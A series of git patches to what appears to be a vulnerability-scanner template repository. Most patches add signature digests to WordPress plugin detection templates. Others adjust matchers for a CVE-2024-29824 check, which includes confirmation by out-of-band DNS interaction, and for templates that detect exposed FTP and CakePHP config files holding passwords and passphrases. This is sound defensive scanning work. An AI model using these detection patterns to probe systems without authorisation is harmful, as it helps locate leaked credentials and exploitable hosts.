b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e37ef8821732017dd10c1f5855b86cd0c9e9623e48c8942da2d5921fd122ba2e0220617c7e0040d8e31cd0369d773b084a808104597500e2df8332abf662b3959304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..b8fc4291e2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022076180cd195018ab9e9f7a9d4176fcbf958bbbfa5dbe9bf6c9abc713e0d92496b022100b10b1349b80d16788621ae156a1101089a582133f1260ca71d897362d8c304fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a4c9f2c7c4..3dd9f9ecd4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b0fedd4573efc6339f4af68751477f67a1eee123716803c99545528d9cb906c4022100e1026e48e2857b76451de9731e92b520b83e1d30218187149db5785f35802f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1fd49d2e08..6d06592853 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079d9bad3aa17e0060ffb79c9fdbcdedab1374a82837503da78565c7d53074e2102205c53286200279e0a2d515cfff5cdf8f439ae6e5db7f9090e105d8217d48aa70d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..6652e7029b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef66f2253a8f73bea318f5b0680399f21cb3547902630a77bb76a318ab5cca7e022077ac979d0ed49dd0b540931c5ed95159c861fc05b5e8fa0f59bc85ac27103102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..1ea3ecb269 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dad72f581bb5f7b9563180a79f47ea7c9ffd7670b3231dc1c3243b23e6c717bd02205ad3ccddfea7791e4bcd8bfcae1ead9082201202355c1d0fd59b75b02a64d12e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..b15b2ffcda 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081dd687fc09142b0d253ff4231b5a5216485470aa90266d970f87949453fd209022100a92d657697fe8e5f21d12012cfafee2da44e59433986c94fb1e2d806fd5a8b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..900986c2bf 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7197dc799937ee92a87070e2bec7a9d4639e3ea97f47110a4e0ee57e96d157502202526f2ec0feaa66298b13a51c062e10ce098d5a68c70aa3e4c395c0b3da5958c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..9509390008 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eea6cf0e1df7b33b12ddb8ff27b40445f3ce7562c9e03da26f7ddb1ef832db0f022052d4d100693f572d1e90f863d80d04b19b01fc9a2658fb3d4bad716e54e31131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..ec00e264f7 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d51b4b1c2f7f05b3c53641b2d1400748fef58bd0bdada3358e5da4189ac52923022100fbff9a0f8a447b45b5e57d7e3fa9b450d6140079718929896d776f5cf4f1ab88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..ede63fcebd 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022033a9234e8539159bc84c8b36d569ae45f9d9d5a5c91ac3761f8e719df7319bfa02204a2679103aaf5363fe8a3f3a552ec4bf40a1d718f0986d9cbc43eb0f4056106f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..88a00e1044 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2e091554bc5bad35ed3a8d0c7990b85dca490a3d30845e2c6345e8389fc9724022100cd7c74c245a965d3ec0a28d75ac9eb1ddbade3daf9953d15941807afad0a94c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..41558aff39 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009ae2c109080e0ea2fd7a55713bc8d5549264c4a5a0ea174e8cda7931b5bf57b0022100f6e9fa818faaafb7a0ca720bd695d24d3f3abc4d3ca50a298360a54bed796f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..0d229e73b7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b09c830896ef670733aed4fe8f3d2c695288b05df1898aa3227ffb201f60a0a0221008c861aa63ffc11dcc23dfb708a06dd6da364aeffb5b7f6c748997f671380f87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..1e2f29fd85 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b3e88214161a30342b236b59057932b97795a3c3c3c48bd5c87b74c31f1701f102207f71824d375dba6ed32c09e378a315680a74e9c758a4a31f2f82182695431367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..bfb5acae5b 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022008e8dcca47f05533aae9ee2b3b08c7c11361d7da04592281a67e6db48d2e5dc402207cb4138e376cdb3455f23f5ae6388a461308ea9d694a40eaaf21a90ad8a5d6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..9162eda89b 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013913404d1523caa5bd905fb2cc69b0b5efe0ac87403c5fca79e37fdf8ad5abd022023253c52a490e535921a300ee9cbadacfe4750b960fb30e73b1e4692c0510f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..b3c63a70c5 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa4d2b195a0c3c442794a38115dfbdb84baa56ded179d65ac5e1b69d761d3d24022100fbe180a1204cdfd181f1b67c19a2e08d326d018d4082187ee9c03b1550d85d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..2139efeae3 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220493fd9fcd73e4303db85563000214d868fc8e0f8b3c04be990b0868094ab492c022055f9b3ce183acccfc6d2589378b7e7f70c3faa6ee6b0a2dfef0beeacfdb71aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 34115bcd0f..7aeb370f59 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a23e05acf76755b0dc8c06f9cbede36c40f764c61679ced5b406e63e2c1c2773022100d61a193b1d7109d7bb824052bcb4a1adcf93fa1dc6fa2ffb66c5789deb1f43fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..b8a1af5ae5 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e6655ebe92e82938c265a88ce42c5b6932de4ab233475440ba335a9b9b60ee702200b819cbd5b507419851cbc6f52ba56396c879a00871ffaefcfba47b6a3532b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..83b2d3b3f5 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9445f5acc64cbc97004c27d719b75a91e7c36e16a58394be6034dc1818dd7b8022068aef7dd6f2909fa6e7f08ed5a1e8a17bfdbae9b32d0efdffaae4034b7bd0557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..34d0aed30b 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ea91e89b79a8426b9df9228cd437caf6116247a54127f8063800d21165dbd0902210094418fbb57c68e1f1771f0818fea60d6c756522ad9c9ea77dddc00a2e1ee33c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c3ec4ebd80..784f3ce059 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b95cc744d94df5bcd6887b99e01002a229556da5e96c7304617611b0a7c8615d022077f7c57bec02e0fac7a7af345ecd9ad2f79942bd0256df25208ee1ce9432a0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..463b6d4f99 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7db53b75ca28aff0f25241d7d1b36d764ce8deef81e92b1dab7f9ced6bb428902206dc8542cbd6a3b4ea9ce0143ccfdfb7c24ec1316e7830a5820d2f48fd60c78dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..23d9f42047 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009effd6619ff898d2d6c02b2cf087f9720d228ff1fa919f0a645a373248b4075f022100e85b57984913bfb2e39477ce6e5e07151e5b189e80cc96eaaefb739ac9d4f60b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 7b28bf7020..f9ceb98f72 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d27581421e435c9c08dcdc7779859d3ddafa3db275b6ca7fedc49bd7872130f602206166c58f888da5e46c487407359a68231dcaf9b2e637861a622d226f0765c3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index da6abc2a81..03c096f3aa 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8743a297cf75caac3984fd204b83188d931d3486a7867491b7f283e9277c1ac022033e0bc7d3a0e0796b933e27f6e426e8f96be9e212e104e4b5d9022f34a55c625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..386a43abad 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220170ff29ba15d91e0bdcc391a31f18145109840eb88d6188115d9810ce85f712b02203023bf16378ff890174a2ffe4318b0038902b36d8570e120f7b42160ff018295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..58d346fcdd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022065e92e7a7b8ba2fab80ada723d9f5cd62e3cf9d99c37e60aba9847d587b6c17902202b5165c7d6427dc73831d78a4c3db368b7fab5da222a1a2dd193a192264e901d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..3f87c6a330 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220769dd70ea8ca140a77bb108c775dc91df0774d6fe1fdfdd99f0c1887db866862022100ae8064d72402915e76d3346b2d20512ba3cecf5a719e6ce0be1fd44c88b92932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..5cc8a49e95 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e61d95d3f2cffa995f936a1305c051dd8bf0d92ac784053aa0ad046d323bb2e0220576d96c7d335968ede2a7c79a3aaefcdf9e59e69f15380d3b895d5a4949437df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b4f5d9abfc 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a92b15b5ae1cdcda325b748b7bbd716b7c36b7fd3baca034abd5c2e461b66705022009ff931a5022553bbd4670482c4016a1d72628f11216653d51177e94becbe0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..7097ae92db 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220666ec0a80ee38cacfc711704cd45751284592c290cb1186234010f97f613ac4502204f2b1c5dbba243c4c75a0996090710b170971da1ba1707e8ab9e81eff99cdc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..86250ca660 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e8b0b790389332084c2623372053aaeb5fa801e2d1c08885ed50459cfe6657402202b9e0fdfd0954dc0ae11203189a6438cc340e6d2393eaa703fdddcb82ac8e87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7cb711e63dcac534073858d15cce4720e9696ab0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 14:17:36 +0530 Subject: [PATCH 0439/1841] Update CVE-2024-29824.yaml --- http/cves/2024/CVE-2024-29824.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index 36ecbd187e..91324f5ea9 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -43,10 +43,15 @@ http: matchers-condition: and matchers: - type: word - part: header + part: content_type words: - 'application/soap+xml' + - type: word + part: body + words: + - 'UpdateStatusEventsResponse' + - type: word part: interactsh_protocol # Confirms the DNS Interaction words: @@ -55,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e7923b00ef9ead9d19fb59cc891e3b7ac1d6e0568ded82cb74735024bcf13bc022057ef188392633662d73cde6703d2ec9dffe733b7c63f613e303c7ec3ce0e204a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e7923b00ef9ead9d19fb59cc891e3b7ac1d6e0568ded82cb74735024bcf13bc022057ef188392633662d73cde6703d2ec9dffe733b7c63f613e303c7ec3ce0e204a:922c64590222798bb761d5b6d8e72950 From 2c96d316d76d7870339cf26e2d1b6c31f3762d07 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Jun 2024 14:22:11 +0530 Subject: [PATCH 0440/1841] Update ftpconfig.yaml --- http/exposures/files/ftpconfig.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/files/ftpconfig.yaml b/http/exposures/files/ftpconfig.yaml index d9cc127685..8294420124 100644 --- a/http/exposures/files/ftpconfig.yaml +++ b/http/exposures/files/ftpconfig.yaml @@ -23,6 +23,7 @@ http: - '"protocol":' - '"host":' - '"user":' + - '"passphrase":' condition: and - type: status From 8472835bcf4925ab7e6917957b2c0a5921cf6a61 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Jun 2024 14:28:13 +0530 Subject: [PATCH 0441/1841] Fix FP cakephp-config.yaml --- http/exposures/configs/cakephp-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/configs/cakephp-config.yaml b/http/exposures/configs/cakephp-config.yaml index 457e96b498..d433ba37bc 100644 --- a/http/exposures/configs/cakephp-config.yaml +++ b/http/exposures/configs/cakephp-config.yaml @@ -33,6 +33,7 @@ http: - "host:" - "name:" - "pass:" + - "adapter:" condition: and - type: status From 307fe13419d8de41e0c5af25b7ff77b333dfbdf7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 09:04:17 +0000 Subject: [PATCH 0443/1841] Auto Template Signing [Thu Jun 20 09:04:17 UTC 2024] :robot: --- http/exposures/configs/cakephp-config.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/configs/cakephp-config.yaml b/http/exposures/configs/cakephp-config.yaml index d433ba37bc..65b2664b47 100644 --- a/http/exposures/configs/cakephp-config.yaml +++ b/http/exposures/configs/cakephp-config.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207fac05bf9b5288590ff1dad404df9c154e769f295f3ab5bab661b78c63a426a1022100ac01085c886cc028a468998118b39172fdd3340f9ce5e506c2767184ee4b19a5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220174e7b56d757ddb7d9ac26c557c04492c7b48a1af990970c8b1be5a74a6755a602210093f0838189c77f10640775dcf7d86e66d79c9bcf41fcaf9408b0fd0c49f4a22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5102fb9f6e5a38c141a052f418e0bd5faeae7973 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 09:28:43 +0000 Subject: [PATCH 0445/1841] Auto Generated Templates Checksum [Thu Jun 20 09:28:43 UTC 2024] :robot: --- templates-checksum.txt | 408 ++++++++++++++++++++--------------------- 1 file changed, 204 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e15cbcc498..8508b8c03f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1346,7 +1346,7 @@ http/cves/2017/CVE-2017-18528.yaml:1c2229d1bba8f9863847e11cd8d180c98ef90eaf http/cves/2017/CVE-2017-18529.yaml:89c767b8b124e36686e155009e365c6c3b0c6686 http/cves/2017/CVE-2017-18530.yaml:32dc03bb1f152ceae4c3716b380a274d3a0b7d00 http/cves/2017/CVE-2017-18532.yaml:c086ef546c86b9b1decf726d80792a0786cf2062 -http/cves/2017/CVE-2017-18536.yaml:1d0aa6477c422562827bb3975b2309bc7151e582 +http/cves/2017/CVE-2017-18536.yaml:f981bea6a36433bfd3b72e1b26e0ea78327b7431 http/cves/2017/CVE-2017-18537.yaml:1a8c7654a3767e77b04c5373847117343ef8b9e7 http/cves/2017/CVE-2017-18542.yaml:69e4b9bcde4a98cfa8e06c3dc033151d89beadde http/cves/2017/CVE-2017-18556.yaml:2561ca8692cf26d6cabf31c7d770b354ad73e863 @@ -3328,7 +3328,7 @@ http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 -http/cves/2024/CVE-2024-29824.yaml:536cf11756418d5648a093c543b58ed024e0d9fc +http/cves/2024/CVE-2024-29824.yaml:1fbe1ce025b6c27942a9b3675b6f62c20481c1d6 http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 @@ -4699,7 +4699,7 @@ http/exposures/configs/azure-domain-tenant.yaml:537cfd449ad2413268752cb92200e358 http/exposures/configs/babel-config-exposure.yaml:e3b7be4f09d41013125edd362cc94b181fe40e9f http/exposures/configs/behat-config.yaml:050530632c7cf5f4ae9c6eaf57c98a9e2a255fa0 http/exposures/configs/blazor-boot.yaml:046d24d6986d4d88f159b8988e957d035522309d -http/exposures/configs/cakephp-config.yaml:e1f8bcbd3b9e008d9ff4c5f93c716adc83bcf32e +http/exposures/configs/cakephp-config.yaml:831df9bbb4f05ef9746bf2b9a491c0f98a75f0c6 http/exposures/configs/cgi-printenv.yaml:7c92dc17471fda7db954fb5dc29ca330eb0007b3 http/exposures/configs/circleci-config.yaml:851472c99b952647f42bb5b5201acc48b48fe3e6 http/exposures/configs/circleci-ssh-config.yaml:03053360752de5b3c8eff7878db3d4997c3c1188 @@ -7111,227 +7111,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d 